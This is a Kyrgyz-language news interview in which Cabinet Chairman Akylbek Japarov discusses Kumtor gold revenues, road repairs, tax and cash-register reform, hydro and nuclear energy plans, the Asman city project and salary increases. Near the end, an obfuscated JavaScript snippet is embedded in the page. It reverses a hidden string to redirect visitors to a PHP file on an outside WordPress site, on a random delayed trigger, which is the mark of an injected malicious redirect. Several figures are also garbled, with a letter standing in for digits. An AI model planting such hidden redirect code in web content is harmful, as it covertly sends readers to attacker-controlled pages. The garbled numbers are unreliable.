Акылбек Жапаров: “Менин ишиме эл өз баасын берет”

18-февраль, 2022-ж. / Редакция / Жаңылыктар 49

Министрлер Кабинетинин Төрагасы Акылбек Жапаров:

Акылбек Үсөнбекович, Жогорку Кеңештин депутаттары тарабынан сиздин дарегиңизге ар кандай сындар айтылып жатат. Депутат Жеңишбек Токторбаев: “Кумтөр” боюнча маалыматты жашырууда. Акылбек Жапаров төрөлгөндө еврейлер ыйлаган…” деп айтты. Бул сын боюнча эмнелерди айта аласыз?

Мен парламенттин 3 чакырылышынын депутаты болгом. Депутаттар көп учурда чын-тамашаны аралаштырып сүйлөшөт. Балким, ошондой болсо керек. Буюрса, “Кумтөр” боюнча сүйлөшүүлөр аягына чыгайын деп калды. Марттын он бешине чейин канадалыктар менен сүйлөшүүнү тынч жыйынтыктоого макулдаштык. Жакынкы аралыкта бул маселе тууралуу Президент маалымат берет. Биз толук маалыматтын баарын парламентке дагы беребиз. “Кумтөргө” тышкы башкарууну киргизгенде эсебинде болгону 4ү миң доллар акча бар болчу. Өзүңүздөр билесиздер, бул эң чоң ири ишканалардын бири. Канадалыктар 4-5 жылдан бери кыргыздар бир күнү мекемени өздөрүнө алат деген ой менен даярданып эле жүрүшкөн экен. Алтындын баасы улам көтөрүлгөн сайын кеткилери келбей жүрүптүр. Бирок, азыркы санарип технологияларды колдонуп, чет мамлекеттердеги банктарда эсептерди ачып, акчалардын баарын ошол жакта кармашчу экен. Жылдын аягына чейин жалпы жонунан 326-329 млн доллар киреше көрдүк. Компанияга жүгүртүү үчүн бир айда 35 млн доллардан 50 млн долларга чейин капитал керек. Ошол акчаны алып койсок, бюджетке салыктан башка 220 млн доллар таза киреше берип жатат. Мурун “Кумтөрдү” башкарып жаткан канадалыктар 4 пайыз салыкты дагы төлөбөй жүргөн. Азыр аны дагы төлөп жатат. Жалпысынан дүң кирешенин 1ү пайызын өлкөгө төлөп берүүдө. Мурунку планга караганда 4,5 млрд сом көп акча төлөп берди. Иш ачык-айкын жүрүүдө. Бирок, депутаттар сурап жаткан сырларды канадалыктар менен жабык эшик артында, акыркы сүйлөшүүлөр бүткөндөн кийин сиздерге да айтып беребиз.

Өндүрүлгөн алтын кайда, кимге, канчадан сатылып жатат? Ушул суроо коомчулукта көп айтылып жатпайбы. Ачыктай аласызбы? Буга чейинки президенттер “Кумтөрдөгү” коррупцияга аралашкан деп айткан элеңиз. УКМК Аскар Акаевди таптаза кылып кетирди. Аскар Акаевич дагы сизди күнөөлөп келген…

Мамлекеттик комиссиянын төрагасы катары парламентте отчёт берип жатып, 2003-жылы “Центерра” компаниясы түзүлгөндө австралиялык бир компания акцияларды алып, 44,3 млн долларга сатып кеткен, ошонун аягы биринчи президенттин туугандарына келип такалганын айткам. Аны 2012-2013-жылдары Башкы прокуратура териштирип, далилдеп берген. Аялынын жакын туугандары качып жүргөн экен, алар дагы келип тастыктады. Кимиси күнөөлүү же күнөөлүү эмес экенин сот чечим чыгарып жатат. “Кумтөрдү” кыргыз элине алып бергенде президенттердин тагдыры мынчалык кейиштүү болбойт эле деп ойлойм. Садыр Нургожоевич мени комиссиянын төрагасы кылып чакырып жатканда, “Менден үчүнчү ирет президент суранып жатат, мен бул ишти аягына чыгара алам, тарыхын, механизмдерин билем. Кыргыздын кызыкчылыгын коргой алчу юристтер, иштетип кетчү кыргыздын жигиттери дагы бар. Бирок, саясий эрк керек” – деп айткам. “Алтынды көргөндө периште дагы адашыптыр” дегендей, буга чейин президенттер дагы адашып жүргөн. Аларды көргөн калгандары дагы адашып, “крыша” болуп жүрүшкөн. Камчыбек Кыдыршаевич “крышалардын” баарын жойгондуктан, 31 млрд сом казынага түшүп жатпайбы. Акаев келип, мойнуна алып, тастыктап, коррупциялык учурлар болгонун айткандан кийин, “Центерра” компаниясы дагы сүйлөшүүлөргө ыкчамыраак бара баштады.

Ал эми 350 тонна алтын казып алып жаткан Россия дагы алтынды сыртка чыгарган жери жок. Биздин алтын дагы сыртка чыкпады. Биз аны сатып, андан түшкөн акчалардын баарын экономикага киргизип жатабыз. Ошондуктан, кабатыр болбоңуздар. Буга чейин 410 тонна алтын сыртка чыгарылып сатылып кеткен. Биз мындан нары колубуздан келсе алтынды Кыргызстандын ичинде алып калсакпы деп жатабыз. Азыр ага Министрлер Кабинетинин, Улуттук банктын, бөлөк банктардын мүмкүнчүлүктөрү бар.

 Жол маселеси аябай курч болуп турат. Бул тармакта маселени чечүү үчүн кандай иш-аракеттер жүрүүдө?

Быйыл 20 миң тонна битум алып бергени жатабыз. Былтыр 5-7 миң тонна битум алынган эмес. 3 жолу тендер өткөрдүк, компаниялар келбей жатат. Ошондуктан, заводдорго түз чыгып, алып келип беребиз. Бул өткөн жылга караганда 4 эсе көп жолдор оңдолот дегенди билдирет. Былтыр 70 миң чарчы метр жамоо иштери жасалса, быйыл 400 миң чарчы метр жасалсын, 250 миң метр жаңы жолдор салынсын, райондук деңгээлдеги жолдорду оңдоону 650-730 км.га чыгарасыңар деп тапшырма берилген. Транспорт министрлигинде чоң реформалар жүрүүдө. Жакында “Кыргыз авто жолдору” деген мамлекеттик мекеме түзүлдү. Жол фондусу түзүлүп, акчаларын бөлүп бердик. Битум сатып алганы 4 млрд сом даяр. Мындан сырткары 400 техника алып беребиз. Түштүк Корея, Россия, Кытай менен сүйлөшүп жатабыз. Бул жылы ирригация менен жолдорго абдан чоң көңүл бурулууда.

Өзүңүздүн орун басарыңыз Эдил Байсаловдун ишмердүүлүгүнө кандай баа бересиз? Анын дарегине айтылган сындар жөндүү деп эсептейсизби?

Иш болгон жерде сын айтылат. Эдил Байсаловдун жогорку потенциалы бар деп эсептейм. Ал болгону эмоциясын башкарууну үйрөнсө эле туура жолдо баратат. Мен анын кээ бир маселелерде колдоосун сезип жатам. Ага убакыт берсек, андан мамлекеттик деңгээлдеги мыкты жетекчи чыгат.

“Акылбек Жапаров кызматтан кетет экен” деген сөз чыгып, аны Президенттин маалымат катчысы төгүндөп, “Узак мөөнөткө иштейт” деди. Өзүңүздүн чечимиңизде канча мөөнөттө иштейм дейсиз?

Кечээги күнгө бара албайт экенбиз, бүгүнкү күн Кудайдын буйругу экен. Мага чейин кимдер келип кеткен эмес. Кеткенге дагы, иштегенге дагы даярмын. Эртең менен 7де келип, түнкү 10го чейин иштеп жатам. Эл, Президент Садыр Нургожоевич өз баасын берет го деп ойлойм. Экономикада сыйкырдуу таякча жок. Туруктуу өсүп-өнүгүп кеткенге 3 жыл керек. Азыркы саясий жетекчилердин баары менден 4-5 жаш кичүү экен. Президент “Кумтөрдөгү” алтын схемасынан баш тартты, бажы, салык, алкоголдогу “крышаларды” талкалаган ушундай жол менен кетсеңер, мен 3 жылда баарын ордуна коюп бере турган оюм бар деп, иштеп бере турган планымды айтып жатам.

Казынаны 400 млрд сомго жеткизебиз деп айтып жатасыз. Бул үчүн Салык жана Бажы кызматтарынан түшкөн каражатты көбөйтүү керек. ККМ азыр толук кандуу кирбей турат. Бажы кызматына кирешени көбөйтөт деп барган жигит коррупцияга шектелип кармалды. Буга эмне деп жооп бересиз?

Ал жигиттин күнөөлүү же күнөөлүү эмес экенин сот аныктайт. Ноябрь-декабрь айларында планды толтуруп, 1 млрд 700 млн сомго көп болгон. Ошонун планы, реформасы менен январь-февралда Бажы кызматы пландан көбүрөөк акча төктү. Мүчүлүштүктөрү болушу мүмкүн. Ал туурасында укук коргоо органдары иштеп жатышат. Мен Министрлер Кабинетинин Төрагасы катары ал жигиттин ишине канааттанып эле жаткам. Быйыл бюджетти 400 млрд сомго жеткирели деген планды койгонбуз. Кийинки жылы 500 млрд сомго жеткизели деп жатабыз. ККМ аппаратын 1991-жылдан бери коюп башташыбыз керек болчу. Буга чейинки президенттер, 30дан ашык премьерлер “Менден кийинкилер келип койсун…” деп жүрүп, ушуга жеттик. Вице-премьер-министр болуп келгенимде, дагы кийинкиге жылдырабыз дегенге болбой КНС төлөгөндөргө электрондук счет-фактураны киргиздик эле, ишкерлер 5 айдын ичинде 5 трлн 300 млрд сомго жакын товарды бири-бирине сатышыптыр. Анын ичинен 744 млрд сомду патентке чыгыштап салышып, “кара тешик” жаралып калган. 6 айдын ичинде бүтүндөй Казакстан 69ү вагон жыгач материалдарын алып келсе, биздин 6 ишкерибиз Россиядан 1001 вагон жыгач алып келген. Баарын патентке таратып жиберген. 1 кубун 6 миң сомдон каттаган дагы, базарда 15 миң сомдон 21 миң сомго чейин саттырып жатат. Базарда турган киши 500-1000 сом эле төлөйт. Ошол үшүп соода кылган адамдан такыр салык албайлы, 6 миң сом деп каттап, 15 миң сомдон саттырып жаткан адамдан салык алалы деп жатабыз. ККМ аппаратын колдонгондор ү млн сомго чейин акча жүгүртүүсү болсо, эч нерсе төлөбөйт. Муну баарына түшүндүрүүдөбүз. Бирок, товарды кимден алдыңар, ИННди айтып койгула, биз эң чоң киреше алып жаткандарды салык төлөтөлү деп жатабыз. Ушуну эл туура түшүнүш керек. ү млн сомго чейин таптакыр салык төлөнбөйт, ү млн сомдон 30 млн сомго чейин тармагына жараша 1 же 2 пайыз төлөйт. Куранда кырктын бирин төлө дейт. Биз жүздүн бирин бер десек, “Акылбек Жапаровду эртерээк айдабасак болбойт” деген кишилер парламентте олтурат, аны билем. Президент менен жолукканда дагы бир топ байлар “Эгерде «Салык Кодексин» Акылбек Жапаров жазып чыкса, биз үчүн бир балээ болгону турат” дептир. “Өзүңөр окудуңарбы?” десе, “Жок, окубадык. Акылбек Жапаров жазса, биз эми салык төлөй баштайбыз” деп айтышыптыр. Колунда барлар, байлар салык төлөмөйүнчө жетим-жесирлерди, майыптарды кантип багабыз?! Сиздердин жардамыңыздар менен ушул боюнча элге туура маалымат жеткизебиз деп ойлойм. ККМ аппаратын киргизүүнү базарларда гана тайм-аут алдык. Ал жакта хронометраж жүрүп жатат. 1 рулонду 3 же 30 сом деп каттап коюп, чет жактан келген жарандар сатат экен. Ошолордон салык алалы десек да мага каршы чыгып жатышпайбы. үшүп-шишип базарда тургандардан салык алгым жок, тонналап товар алып келип, күнүнө 100-200 миң доллар соода кылып жаткандар кыргыздын мыйзамы боюнча милдеттүү түрдө салык төлөшү керек. Бүгүн же эртең система өзгөрөт, сөзсүз салык төлөшөт. Жакынкы аралыкта санарипке толук өтөбүз. Биз системаны өзгөртүүдөбүз, эл менен күрөшкөнүбүз жок. Кечээ тийиштүү документке кол койдум, көзөмөл чекти чогултуу менен “Айфон” уюлдук телефонун утуп алса болот. Мамлекеттик, муниципалдык кызматкерлерге, пенсионерлерге квартал сайын квартира коёлу деп жатабыз. Айтор, мен эл мененмин.

 Россиянын “Русатом” ишканасы менен Кыргызстан чакан атомдук электр станциясын куруу боюнча келишимге кол койгону тууралуу маалыматтар айтылган. Өлкөгө атомдук электр станция куруунун кажети барбы?

Биз азыр жаңы кылымга, жаңы доорго өттүк. Нанотехнологиялардын заманы болуп жатат. Коңшу Кытай мамлекети 100 атомдук электр станцияларын курганы турат. Белоруссия куруп бүттү. Казакстандын президенти “Биз дагы АЭС курабыз” деди. Өзбекстанда куруу долбоорлору башталды. Бул бир күндө эле курула турган нерсе эмес. АЭСти курууга 50 жылдан 100 жылга чейинки өзүнүн циклдери бар. Бизде коңшуларга окшоп күчтүү реакторлорды курбасак дагы, чакан реакторлорды куруу боюнча Энергетика министрлиги менен “Русатом” кол коюшту. Мунун үстүндө иштей беришибиз шарт. Окумуштууларыбыз, инженерлерибиз даярдана бериши керек. Бүгүн болбосо эртең атомдук станциялар дүйнө жүзүнө тарайт.

Сиз 100 чакан ГЭС, шамал жана күндүн нурунан энергия алчу станциялар курулат деп айткан элеңиз. Бул долбоорду ишке ашыруу үчүн каражат кайдан табылат?

Энергетика тармагы — бизге эң чоң экспорттук потенциал алып келчү тармак. Гидроэнергетиканын 10 пайызын гана колдонуп жатабыз. Өткөн жылы суу аябай тартыш болгондуктан, баарыбыз колубузда эмне деген байлык бар экенин түшүндүк. Президент Садыр Нургожоевичтин тапшырмасы менен быйыл «Камбар-Ата-1» ГЭСнин биринчи этабын өзүбүз баштаганы жатабыз. Жакынкы аралыкты Каржы министрлиги 500 млн долларга чейин Евро фонддорго, алардын рыногуна чыкканга аракет кылып жатат. Инфраструктурасын түзүүгө 1ү, ү млн доллар керек экен. Бул каражатты таптык, бюджетте бар. Буюрса, 1-апрелден тартып ишти баштайбыз. «Камбар-Ата-1» ГЭСинин курулушуна Өзбекстандын президенти Ш. Мирзиёев дагы абдан кызыкдар экен. Казакстанга болгон иш сапарымда казак президенти Касым-Жомарт Токаев дагы “Биз дагы ушул долбоорго катышсак болот эле” деген оюн айткан. Биз алар келип бул долбоорго катышканга каршы эмеспиз. Ким кандай шартта катыша турганы сүйлөшүүлөрдүн натыйжасынан болсо керек. Бирок, бул иштин алдында «Камбар-Ата – 2» ГЭСинин экинчи агрегатын коё беребиз. Ушул жылдын аягына же кийинки жылдын май айына экинчи агрегат дагы иштеп калат. Мындан сырткары 4 чакан ГЭС курууну дагы өзүбүздүн күчүбүз менен баштаганы жатабыз. Кыргыз-Орус өнүктүрүү фондусунун негизинде “Бала-Саруу” чакан ГЭСинин курулушу быйыл башталат. Долбоору бекитилип, тендер жүрүп жатат. “Бурулдай”, “Орто-Токой”, “Кара-Көл” чакан ГЭСтерин “Кумтөрдөн” түшкөн акчага курууга Президинтибиз жаңы ачылган “Улуу Көчмөндөрдүн Мурасы” деген компанияга милдеттендирди. Өзүбүздүн чыгаан кыздарыбыз дагы бар экен, шамалдан энергия алуу үчүн 100 агрегат коём деп жатат. Биз болгон шарттардын баарын түзүп беребиз. Токмокто күндүн нурунан 120 МВт электр энергия алчу станциянын курулушу башталат. Ысык-Көл, Жалал-Абад, Ош, Баткенде дагы ушундай станцияларды курууну баштайбыз.

“Айыл банк”, “РСК банк”, «Керемет» банктарынын уставдык капиталын 100 млн долларга жеткизебиз. Кепилдик фонддун негизинде “Өнүгүү” банкын 5 млрд уставдык капиталы менен түзөлү, андан кийин 5 млрд сом берип, аны дагы 100 млн долларга жеткизели деп атабыз. Булар элдин банкы болгондон кийин элдин таламын аткарат. Элге узак мөөнөттөгү, үстөк пайызы аз кредиттер керек. Ушул жылы айыл чарбасына 6 пайызга чейин 26 млрд сом кредиттерди беребиз. Булактардын баарын тактадык, 176 млн доллар кетет. Орто, чакан ГЭСтерди курганга Өкмөт кепилдик бергенге даяр.

Ишкерлерди коргоо боюнча кандай аракеттер көрүлөт?

Каржы полициясы жоюлду. Ал жоюлгандан кийин 5 млрд сом салык көбүрөөк түшө баштады. Коррупцияга каршы күрөшүү кызматы дагы жоюлду. Ишкерлерди коргоо боюнча Башкы прокуратурада атайын башкармалык ачылды. Биз өткөн менен алектенбей, бүгүнкү жана эртеңки күн менен алпурушуудабыз. Ишкерлерди кетирбейбиз, тескерисинче сырттан келем дегендер көбөйүп жатат. Дүйнө жүзү боюнча инвестициялардын көлөмү азайса, бизде түз инвестициянын көлөмү 26 пайызга көбөйдү. Бизден кетип жаткан акчанын көлөмү былтыркыга салыштырганда 20 пайызга азайды.

“Асман” шаарын куруу ар кандай пикирлерди жаратып жатат. Бул долбоорду ишке ашыруу реалдуубу?

Өзүнүн шаарын куруу кыргыз элинин кыялы. Экологиялык шаар куруу боюнча Президентибиздин кыялы иш жүзүнө ашат деп ойлойм. Биз азыр башкы пландын үстүндө иштеп жатабыз. Аябай кызыктуу сунуштар түшүп жатат. Кызыккан инвесторлор дагы бар. АКШда иштеген өзүбүздүн жараныбыз Каракол шаарында IT шаарчасын курууну пландап жатат. Анын кыялы ишке ашса, эмнеге “Асман” шаарын куруу ишке ашпайт? Астана шаарын курабыз дегенде дагы көпчүлүк ишенген эмес. Курушту, шаар өнүгүп жатат. “Ташкент Сити” долбоорун карап көргүлө. Ушундай мыкты кыялдарды ишке ашыруу өзүбүздөн көз каранды.

 Бул долбоор Ысык-Көлдүн экосистемасын бузат деген пикирлер дагы бар. Мындан сырткары, “Асман” шаарын курууну коррупцияга шектелип кармалып, 2 млн сом акча төлөп чыккан Тимур Файзиевге берип жатасыздар. Президенттин кыялы Файзиев менен ишке ашабы?

Тимур Файзиевди көптөн бери билем. Идеяга бай бала. Биз биринчи башкы планды түзүшүбүз керек. Буга чейин бул ой-кыял болсо, азыр биринчи этапка кире баштадык. Буга ушул жигит жарайт. Ал энергиясын, талантын бизге дагы жумшашы керек экенин айтсак, макул болду. Фейсбукка чыгып, өзүнүн ой-пикирин эркин айтып, лекция окуп аябай көнүп алыптыр. Өкмөттүн жумушуна келгенден кийин тизгиниңди тартып, биринчи жумушуңду жасап, жыйынтыгын көрсөт деп айтып жатабыз. 3-4 ай убакыт берип көрөлү.

Апрелден баштап мугалим, врачтардын айлык акыларын көбөйтөбүз деп жатасыз. Кайсыл булак жана кандай көрсөткүчтө көтөрөсүздөр?

Айлык акыны, пенсия, жөлөк пулду салыктын гана эсебинен көтөрө алабыз. Чет мамлекеттерден грант алып, ошонун эсебинен 5-6 пайызга көтөрүмүш болуп коюп элди алдап келгенбиз. Салык күн сайын түшөт, пенсия, жөлөк пул дагы күн сайын алына турчу нерсе. Январдын көрсөткүчтөрү жаман эмес, февралдын көрсөткүчтөрү дагы жакшы, март дагы жакшы болсо, социалдык тармакта иштеп, аз айлык алып жаткандардын баарынын айлыктарын 1-апрелден 50 пайызга, 1-октябрда дагы 50 пайызга көтөрөлү деп жатабыз. Милиция кызматкерлериникин болсо теңдейбиз. Революция болгондон кийин эле укук коргоо кызматкерлеринин айлыктары көтөрүлө баштайт. Бирөөнүкү жогору, бирөөнүкү төмөн көтөрүлүп калыптыр. Эң азы милицияныкы экен, аны чек арачы, прокурорлордукуна теңейбиз.

 $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/18_02-1.pdf»>2022-ЖЫЛДЫН 18-ФЕВРАЛЫ

Жылдыз ДЫЙКАНОВА

18-февраль, 2022-ж. / Редакция / Жаңылыктар 49
Бөлүшүү: Telegram WhatsApp X